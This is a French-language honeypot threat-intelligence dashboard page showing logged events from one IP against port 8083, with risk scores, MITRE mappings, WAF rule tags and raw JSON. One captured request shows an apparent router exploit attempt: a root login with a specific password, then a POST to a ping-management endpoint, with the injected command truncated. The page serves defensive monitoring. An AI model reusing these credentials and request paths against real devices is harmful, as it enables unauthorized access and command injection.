HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "evidence": { "method": "POST", "path": "\/login.gch", "user_agent": "r00ts3c-owned-you", "waf_tags": [ "950327:rce-0", "950331:rce-1", "950407:ssrf-3", "950471:nosqli-3" ], "waf_rule_names": [ "rce-0", "rce-1", "ssrf-3", "nosqli-3" ], "request_line": "POST \/login.gch HTTP\/1.1", "request_sample": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST \/manager_dev_ping_t.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: ", "payload_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "classification_reason": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%" }, "attack_stage": "exploit_attempt", "mitre_tactics": [ "TA0001", "TA0002" ], "mitre_techniques": [ "T1059", "T1190" ], "mitre": "T1059", "threat_family": [ "rce_probe", "ssrf_probe" ], "recommended_client_action": "investigate", "policy_mode": "intelligence", "sensor_role": "threat_intelligence", "event_signature": "ed610c2b5afb0b6a17e9237e4e29c602d177650a", "protocol_details": { "http_method": "POST", "http_path": "\/login.gch", "request_line": "POST \/login.gch HTTP\/1.1", "http_user_agent": "r00ts3c-owned-you", "port": 8083, "service": "http", "service_label_fr": "HTTP" }, "evidence_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "attack_vector": "cmd injection \u00b7 via HTTP:8083 \u00b7 (tentative d'exploit) \u00b7 \u2192 \/login.gch", "target_port_label": "8083 \u00b7 HTTP", "emulator_service": "http", "confidence_reason": "Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9", "site_display": { "classification": null, "classification_reason": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%", "classification_reason_label_fr": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%", "executive_one_liner_fr": "Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP", "confidence_pct": 100, "confidence_breakdown": { "waf": 100, "classification": 85, "behavior": 0, "geo": 0, "protocol": 43, "novelty": 25, "risk_score": 82 }, "attack_stage": "exploit_attempt", "attack_stage_label": "Tentative d'exploit", "attack_chain_stage": "exploitation", "attack_chain_stage_label_fr": "Exploitation", "risk_score": 82, "risk_label": "\u00c9lev\u00e9", "service_name": "http", "service_label_fr": "HTTP", "dst_port": 8083, "protocol_emulated": true, "tags_summary": [ "INT-http_cmdi", "pat-0145", "pat-0146" ], "tags_summary_labels_fr": [ "Http Cmdi", "pat-0145", "pat-0146" ], "recommended_action": "investigate", "recommended_action_label": "Investiguer", "mitre": "T1059", "mitre_technique": "T1059", "persona_hostname": "mail.sensor-1.internal", "persona_service_banner": "honeypot-http", "correlation_flags": null, "correlation_flags_labels_fr": null, "sensor_role": "threat_intelligence", "sensor_role_label_fr": "Renseignement menaces", "confidence_hint_fr": null, "protocol_details": { "http_method": "POST", "http_path": "\/login.gch", "request_line": "POST \/login.gch HTTP\/1.1", "http_user_agent": "r00ts3c-owned-you", "port": 8083, "service": "http", "service_label_fr": "HTTP" }, "attack_vector": "cmd injection \u00b7 via HTTP:8083 \u00b7 (tentative d'exploit) \u00b7 \u2192 \/login.gch", "evidence_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "target_port_label": "8083 \u00b7 HTTP", "emulator_service": "http", "confidence_reason": "Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9", "confidence_factors_fr": "Confiance 100 % \u2014 Score WAF 100 \u00b7 4 tag(s) WAF", "campaign_hint_fr": null, "attack_phases_timeline_fr": [ { "key": "recon", "label_fr": "Reconnaissance", "active": false, "kind": "stage" }, { "key": "probe", "label_fr": "Sonde \/ probe", "active": false, "kind": "stage" }, { "key": "exploit_attempt", "label_fr": "Tentative d'exploit", "active": true, "kind": "stage" }, { "key": "post_exploit", "label_fr": "Post-exploitation", "active": false, "kind": "stage" }, { "key": "c2", "label_fr": "Commande & contr\u00f4le", "active": false, "kind": "stage" }, { "key": "exploitation", "label_fr": "Exploitation", "active": true, "kind": "chain", "hint_fr": null } ] }, "honeypot_persona": { "sensor_id": "sensor-1", "hostname": "mail.sensor-1.internal", "mail_host": "mail.sensor-1.internal", "ldap_dc": "dc.sensor-1.internal", "k8s_cluster": "hp-sensor-1", "domain": "sensor-1.internal", "service_role": "http", "service_banner": "honeypot-http", "service_os": "linux", "dst_port": "8083" }, "hostname": "mail.sensor-1.internal", "sensor_id": "sensor-1", "attack_chain_stage": "exploitation", "ban_policy": "advisory_investigate", "tags_list": [ "950327:rce-0", "950331:rce-1", "950407:ssrf-3", "950471:nosqli-3", "http_cmd_injection", "http_credential_body", "http_idor_probe", "http_jwt_body", "http_missing_host", "http_ssrf_body", "net_web_probe" ] }
15/06/2026 21:56:52 UTC	TCP	8083 · HTTP ALT 8083	http-alt-8083	http-alt-8083 http-alt-8083 · via HTTP ALT 8083:8083 · (sonde / probe)	Faible	Faible · 0
Étape Sonde / probe Chaîne Découverte Persona mail.sensor-1.internal Rôle capteur Renseignement menaces Corrélations Multi-protocole corrélé (5 min) MITRE TA0007 TA0007 TA0001 Protocole Émulateur HTTP-ALT-8083 WAF — Recommandation Surveiller Tags — Cible HTTP — TLS SNI — Capteur paris-1
Preuve / Evidence Méthode — Port 8083 Chemin / cible — Service HTTP ALT 8083 Pourquoi cette classification : Type « http-alt-8083 » (signaux protocolaires) · confiance 0% Confiance classification 8% Corrélation +8 Risque capteur Faible · 0 Confiance : Confiance faible (0 %) — classification prudente Protocole émulé 1 Technique MITRE TA0007 Tactiques MITRE TA0007 TA0001 User-Agent — Règles WAF — Meta JSON brut { "protocol_emulated": true, "emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b", "emulator_response_len": 82, "port_inferred_service": true, "bytes_in": 0, "payload_entropy": 0, "port_category": "registered", "org": "CT-HangZhou-IDC", "service": "http-alt-8083", "app_proto": "http-alt-8083", "asn": 58461, "country": "CN", "dst_port": 8083, "risk_waf": 8, "risk_classification": 0, "risk_behavior": 0, "risk_geo": 0, "risk_protocol": 22, "risk_novelty": 0, "risk_boost": 0, "risk_granularity": 3.7, "risk_breakdown": { "waf": 8, "classification": 0, "behavior": 0, "geo": 0, "protocol": 22, "novelty": 0 }, "risk_score": 0, "tag_count": 0, "anomaly_count": 0, "campaign_key": "4d8aadabcd1c859671a9c5ddc55350e79e517b17", "event_fingerprint": "aafb7ac8941c9e078930e4799c90ed51eac5bf8d", "classification_reason": "Type \u00ab http-alt-8083 \u00bb (signaux protocolaires) \u00b7 confiance 0%", "confidence": 0.08, "classification_confidence": 0.08, "precision_score": 0, "precision_signals": [], "kb_rule_ids": [], "confidence_breakdown": { "waf": 8, "classification": 0, "behavior": 0, "geo": 0, "protocol": 22, "novelty": 0, "risk_score": 0, "correlation_boost": 8 }, "named_classification_skipped": false, "service_name": "http-alt-8083", "risk_confidence_factor": 0, "city": null, "is_datacenter": false, "is_tor_hint": false, "geo": { "country": "CN", "asn": 58461, "org": "CT-HangZhou-IDC", "is_datacenter": false, "is_tor_hint": false }, "fingerprint": { "path_pattern_hash": "54f123e610d8386f898485b621afba15" }, "target_context": { "dst_port": 8083, "service": "http-alt-8083", "service_name": "http-alt-8083", "risk_score": 0 }, "attack_stage": "probe", "mitre_tactics": [ "TA0007", "TA0001" ], "mitre": "TA0007", "threat_family": [ "unknown" ], "recommended_client_action": "monitor", "policy_mode": "intelligence", "sensor_role": "threat_intelligence", "event_signature": "6163c2957bda6c59889ded9bedae57bac6349b51", "protocol_details": { "port": 8083, "service": "http-alt-8083", "service_label_fr": "HTTP ALT 8083" }, "attack_vector": "http-alt-8083 \u00b7 via HTTP ALT 8083:8083 \u00b7 (sonde \/ probe)", "target_port_label": "8083 \u00b7 HTTP ALT 8083", "emulator_service": "http-alt-8083", "confidence_reason": "Confiance faible (0 %) \u2014 classification prudente", "site_display": { "classification": null, "classification_reason": "Type \u00ab http-alt-8083 \u00bb (signaux protocolaires) \u00b7 confiance 0%", "classification_reason_label_fr": "Type \u00ab http-alt-8083 \u00bb (signaux protocolaires) \u00b7 confiance 0%", "executive_one_liner_fr": "Activit\u00e9 suspecte", "confidence_pct": 8, "confidence_breakdown": { "waf": 8, "classification": 0, "behavior": 0, "geo": 0, "protocol": 22, "novelty": 0, "risk_score": 0, "correlation_boost": 8 }, "attack_stage": "probe", "attack_stage_label": "Sonde \/ probe", "attack_chain_stage": "discovery", "attack_chain_stage_label_fr": "D\u00e9couverte", "risk_score": 0, "risk_label": "Faible", "service_name": "http-alt-8083", "service_label_fr": "HTTP ALT 8083", "dst_port": 8083, "protocol_emulated": true, "tags_summary": null, "tags_summary_labels_fr": null, "recommended_action": "monitor", "recommended_action_label": "Surveiller", "mitre": "TA0007", "mitre_technique": "TA0007", "persona_hostname": "mail.sensor-1.internal", "persona_service_banner": "honeypot-http-alt-8083", "correlation_flags": [ "multi_protocol_correlation" ], "correlation_flags_labels_fr": [ "Multi-protocole corr\u00e9l\u00e9 (5 min)" ], "sensor_role": "threat_intelligence", "sensor_role_label_fr": "Renseignement menaces", "confidence_hint_fr": "Corr\u00e9lation +8", "protocol_details": { "port": 8083, "service": "http-alt-8083", "service_label_fr": "HTTP ALT 8083" }, "attack_vector": "http-alt-8083 \u00b7 via HTTP ALT 8083:8083 \u00b7 (sonde \/ probe)", "evidence_snippet": null, "target_port_label": "8083 \u00b7 HTTP ALT 8083", "emulator_service": "http-alt-8083", "confidence_reason": "Confiance faible (0 %) \u2014 classification prudente", "confidence_factors_fr": "Confiance 8 % \u2014 Score WAF 8 \u00b7 Bonus corr\u00e9lation +8", "campaign_hint_fr": null, "attack_phases_timeline_fr": [ { "key": "recon", "label_fr": "Reconnaissance", "active": false, "kind": "stage" }, { "key": "probe", "label_fr": "Sonde \/ probe", "active": true, "kind": "stage" }, { "key": "exploit_attempt", "label_fr": "Tentative d'exploit", "active": false, "kind": "stage" }, { "key": "post_exploit", "label_fr": "Post-exploitation", "active": false, "kind": "stage" }, { "key": "c2", "label_fr": "Commande & contr\u00f4le", "active": false, "kind": "stage" }, { "key": "discovery", "label_fr": "D\u00e9couverte", "active": true, "kind": "chain", "hint_fr": null } ] }, "honeypot_persona": { "sensor_id": "sensor-1", "hostname": "mail.sensor-1.internal", "mail_host": "mail.sensor-1.internal", "ldap_dc": "dc.sensor-1.internal", "k8s_cluster": "hp-sensor-1", "domain": "sensor-1.internal", "service_role": "http_alt_8083", "service_banner": "honeypot-http-alt-8083", "service_os": "linux", "dst_port": "8083" }, "hostname": "mail.sensor-1.internal", "sensor_id": "sensor-1", "multi_protocol_correlation": true, "multi_protocol_count": 2, "multi_protocol_sample": [ "http", "http-alt-8083" ], "multi_protocol_window_s": 300, "behavior_alerts": [ "multi_protocol_correlation" ], "correlation_confidence_boost": 8, "attack_chain_stage": "discovery", "matched_patterns": [], "ban_policy": "advisory_monitor" }
15/06/2026 21:56:51 UTC	TCP	8083 · HTTP	http	Injection de commande cmd injection · via HTTP:8083 · (tentative d'exploit) · → /login.gch	Élevée	Élevé · 82
Étape Tentative d'exploit Chaîne Exploitation Persona mail.sensor-1.internal Rôle capteur Renseignement menaces MITRE T1059 TA0001 TA0002 Protocole POST /login.gch UA r00ts3c-owned-you Émulateur HTTP WAF 26 Recommandation Investiguer Tags 950327:rce-0 950331:rce-1 950407:ssrf-3 950471:nosqli-3 Cible HTTP POST /login.gch TLS SNI — Capteur paris-1
Preuve / Evidence Méthode POST Port 8083 Chemin / cible /login.gch Service HTTP Pourquoi cette classification : Injection de commande (tag rce-0) · Injection commande dans la requête · confiance 100% Confiance classification 100% Risque capteur Élevé · 82 Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé Protocole émulé 1 Signaux Http Cmdi pat-0145 pat-0146 Technique MITRE T1059 Tactiques MITRE TA0001 TA0002 Motifs de détection (base) CRS 921130 duplicate CL CRS 932200 CRS 932205 TeamSpeak3 Ligne de requête `POST /login.gch HTTP/1.1` User-Agent r00ts3c-owned-you Règles WAF rce-0 rce-1 ssrf-3 nosqli-3 Payload (extrait) POST /login.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: 420 Connection: keep-alive Accept: / Frm_Loginto Requête brute (extrait) POST /login.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: 420 Connection: keep-alive Accept: / Frm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST /manager_dev_ping_t.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: Meta JSON brut { "protocol_emulated": true, "emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b", "emulator_response_len": 82, "http_header_count": 4, "http_query_params": 0, "http_path_depth": 1, "http_path_ext": "gch", "http_ua_hash": "cf457b39ca1ed09a62427df715058d10b039c109", "http_host_hash": null, "http_target_hash": "297c504799609cfe753e35db128a9be162f28f7d", "http_referer_hash": null, "http_method": "POST", "http_ua_is_cli": false, "http_ua_is_browser": false, "bytes_in": 659, "payload_entropy": 5.466302572005077, "port_category": "registered", "org": "CT-HangZhou-IDC", "service": "http", "app_proto": "http", "asn": 58461, "country": "CN", "dst_port": 8083, "risk_waf": 100, "risk_classification": 85, "risk_behavior": 0, "risk_geo": 0, "risk_protocol": 43, "risk_novelty": 25, "risk_boost": 15, "risk_granularity": 6.7, "risk_breakdown": { "waf": 100, "classification": 85, "behavior": 0, "geo": 0, "protocol": 43, "novelty": 25 }, "risk_score": 82, "tag_count": 11, "anomaly_count": 0, "campaign_key": "567ee99ead398d5e8dff08296735fd3324b36997", "event_fingerprint": "a858fca3b3a8ef48dad20a1cb938d02f0de6e320", "classification_reason": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%", "confidence": 1, "classification_confidence": 1, "precision_score": 212, "precision_signals": [ "INT-http_cmdi", "pat-0145", "pat-0146" ], "kb_rule_ids": [ "INT-http_cmdi", "pat-0145", "pat-0146" ], "matched_patterns": [ "pat-0842", "pat-0145", "pat-0146", "pat-0772" ], "matched_pattern_names": [ "CRS 921130 duplicate CL", "CRS 932200", "CRS 932205", "TeamSpeak3" ], "pattern_ids": [ "pat-0842", "pat-0145", "pat-0146", "pat-0772" ], "confidence_breakdown": { "waf": 100, "classification": 85, "behavior": 0, "geo": 0, "protocol": 43, "novelty": 25, "risk_score": 82 }, "named_classification_skipped": false, "service_name": "http", "risk_confidence_factor": 100, "city": null, "is_datacenter": false, "is_tor_hint": false, "geo": { "country": "CN", "asn": 58461, "org": "CT-HangZhou-IDC", "is_datacenter": false, "is_tor_hint": false }, "fingerprint": { "http_ua_hash": "cf908e3be2b0e84af769ea28409d6afb", "payload_hash": "a6d724e184027cf38cffffe097052d1c", "path_pattern_hash": "566116aa56cf0726ba77deefe998a873" }, "target_context": { "dst_port": 8083, "service": "http", "service_name": "http", "risk_score": 82 }, "payload_preview": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "method": "POST", "path": "\/login.gch", "user_agent": "r00ts3c-owned-you", "waf_tags": [ "950327:rce-0", "950331:rce-1", "950407:ssrf-3", "950471:nosqli-3" ], "waf_rule_names": [ "rce-0", "rce-1", "ssrf-3", "nosqli-3" ], "request_line": "POST \/login.gch HTTP\/1.1", "request_sample": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST \/manager_dev_ping_t.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: ", "payload_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "evidence": { "method": "POST", "path": "\/login.gch", "user_agent": "r00ts3c-owned-you", "waf_tags": [ "950327:rce-0", "950331:rce-1", "950407:ssrf-3", "950471:nosqli-3" ], "waf_rule_names": [ "rce-0", "rce-1", "ssrf-3", "nosqli-3" ], "request_line": "POST \/login.gch HTTP\/1.1", "request_sample": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST \/manager_dev_ping_t.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: ", "payload_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "classification_reason": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%" }, "attack_stage": "exploit_attempt", "mitre_tactics": [ "TA0001", "TA0002" ], "mitre_techniques": [ "T1059", "T1190" ], "mitre": "T1059", "threat_family": [ "rce_probe", "ssrf_probe" ], "recommended_client_action": "investigate", "policy_mode": "intelligence", "sensor_role": "threat_intelligence", "event_signature": "ed610c2b5afb0b6a17e9237e4e29c602d177650a", "protocol_details": { "http_method": "POST", "http_path": "\/login.gch", "request_line": "POST \/login.gch HTTP\/1.1", "http_user_agent": "r00ts3c-owned-you", "port": 8083, "service": "http", "service_label_fr": "HTTP" }, "evidence_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "attack_vector": "cmd injection \u00b7 via HTTP:8083 \u00b7 (tentative d'exploit) \u00b7 \u2192 \/login.gch", "target_port_label": "8083 \u00b7 HTTP", "emulator_service": "http", "confidence_reason": "Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9", "site_display": { "classification": null, "classification_reason": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%", "classification_reason_label_fr": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%", "executive_one_liner_fr": "Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP", "confidence_pct": 100, "confidence_breakdown": { "waf": 100, "classification": 85, "behavior": 0, "geo": 0, "protocol": 43, "novelty": 25, "risk_score": 82 }, "attack_stage": "exploit_attempt", "attack_stage_label": "Tentative d'exploit", "attack_chain_stage": "exploitation", "attack_chain_stage_label_fr": "Exploitation", "risk_score": 82, "risk_label": "\u00c9lev\u00e9", "service_name": "http", "service_label_fr": "HTTP", "dst_port": 8083, "protocol_emulated": true, "tags_summary": [ "INT-http_cmdi", "pat-0145", "pat-0146" ], "tags_summary_labels_fr": [ "Http Cmdi", "pat-0145", "pat-0146" ], "recommended_action": "investigate", "recommended_action_label": "Investiguer", "mitre": "T1059", "mitre_technique": "T1059", "persona_hostname": "mail.sensor-1.internal", "persona_service_banner": "honeypot-http", "correlation_flags": null, "correlation_flags_labels_fr": null, "sensor_role": "threat_intelligence", "sensor_role_label_fr": "Renseignement menaces", "confidence_hint_fr": null, "protocol_details": { "http_method": "POST", "http_path": "\/login.gch", "request_line": "POST \/login.gch HTTP\/1.1", "http_user_agent": "r00ts3c-owned-you", "port": 8083, "service": "http", "service_label_fr": "HTTP" }, "attack_vector": "cmd injection \u00b7 via HTTP:8083 \u00b7 (tentative d'exploit) \u00b7 \u2192 \/login.gch", "evidence_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "target_port_label": "8083 \u00b7 HTTP", "emulator_service": "http", "confidence_reason": "Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9", "confidence_factors_fr": "Confiance 100 % \u2014 Score WAF 100 \u00b7 4 tag(s) WAF", "campaign_hint_fr": null, "attack_phases_timeline_fr": [ { "key": "recon", "label_fr": "Reconnaissance", "active": false, "kind": "stage" }, { "key": "probe", "label_fr": "Sonde \/ probe", "active": false, "kind": "stage" }, { "key": "exploit_attempt", "label_fr": "Tentative d'exploit", "active": true, "kind": "stage" }, { "key": "post_exploit", "label_fr": "Post-exploitation", "active": false, "kind": "stage" }, { "key": "c2", "label_fr": "Commande & contr\u00f4le", "active": false, "kind": "stage" }, { "key": "exploitation", "label_fr": "Exploitation", "active": true, "kind": "chain", "hint_fr": null } ] }, "honeypot_persona": { "sensor_id": "sensor-1", "hostname": "mail.sensor-1.internal", "mail_host": "mail.sensor-1.internal", "ldap_dc": "dc.sensor-1.internal", "k8s_cluster": "hp-sensor-1", "domain": "sensor-1.internal", "service_role": "http", "service_banner": "honeypot-http", "service_os": "linux", "dst_port": "8083" }, "hostname": "mail.sensor-1.internal", "sensor_id": "sensor-1", "attack_chain_stage": "exploitation", "ban_policy": "advisory_investigate", "tags_list": [ "950327:rce-0", "950331:rce-1", "950407:ssrf-3", "950471:nosqli-3", "http_cmd_injection", "http_credential_body", "http_idor_probe", "http_jwt_body", "http_missing_host", "http_ssrf_body", "net_web_probe" ] }

Réputation

Sécurité avancée

Offensive / Recon

Sécurité

DNS

Réseau

E-mail

IP

Utilitaires

115.227.26.85

Profil de menace

Pourquoi listée

Comparaison ASN / FAI

Activité multi-protocole

Géolocalisation

FAI / réseau

Renseignement menaces

Décomposition confiance

Filtres

Timeline

Ports 24 h

Top ports

Top classifications

Heatmap attaques 7j

Chronologie des événements

Comparaison côte à côte

Preuve / Evidence

Preuve / Evidence

Preuve / Evidence

Preuve / Evidence

Preuve / Evidence

Preuve / Evidence